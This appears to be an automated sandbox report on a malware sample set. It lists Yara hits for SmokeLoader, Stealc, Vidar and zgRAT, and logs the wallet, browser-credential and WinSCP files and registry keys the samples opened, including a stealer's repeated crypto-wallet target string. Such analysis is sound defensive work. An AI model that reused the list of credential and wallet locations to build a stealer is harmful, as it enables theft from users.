Source: Yara match	File source: 00000004.00000002.1911380987.0000000004BBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.2775428464.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1911380987.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7932, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\33A6.exe, type: DROPPED

Yara detected SmokeLoader

Source: Yara match	File source: uVQLD8YVk6.exe, type: SAMPLE
Source: Yara match	File source: 0.2.uVQLD8YVk6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.toolspub2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.srvwauv.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.toolspub2.exe.5c15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.uVQLD8YVk6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.srvwauv.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1918764869.0000000002080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2145002254.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1676508085.00000000004F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2145323149.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1676415097.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1919452397.00000000020A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\srvwauv, type: DROPPED

Yara detected Stealc

Source: Yara match	File source: 31.2.nsa984B.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.nsa984B.tmp.exe.8b0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.3.nsa984B.tmp.exe.9b0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.nsa984B.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.3077167175.0000000002435000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3068398850.0000000000400000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2202387362.00000000009B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3071615615.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nsa984B.tmp.exe PID: 7684, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: nsa984B.tmp.exe PID: 7684, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 35.2.CFAA.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.4854.exe.aa0000.0.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	String found in binary or memory: *electrum.Servers
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3E
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|
Source: 4854.exe, 00000004.00000000.1898749556.0000000000C41000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: set_UseMachineKeyStore
Source: nsa984B.tmp.exe, 0000001F.00000002.3068398850.000000000043C000.00000040.00000001.01000000.0000001C.sdmp	String found in binary or memory: nt\Wallets\\|.json\|0\|Ethereum\|\Ethereum\\|keystore\|0\|Electrum\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|\Exodus\\|exodus.conf.json\|0\|Exodus\|\Exodus\\|window-state.json\|0\|Exodus\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|\Binance\\|app-store.json\|0\|Binance\|\Binance\\|simple-storage.json\|0\|Binance\|\Binance\\|.finger-print.fp\|0\|Coinomi\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|\Ledger Live\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\dialer.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Windows\System32\dialer.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\System32\dialer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\F38F.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\dialer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
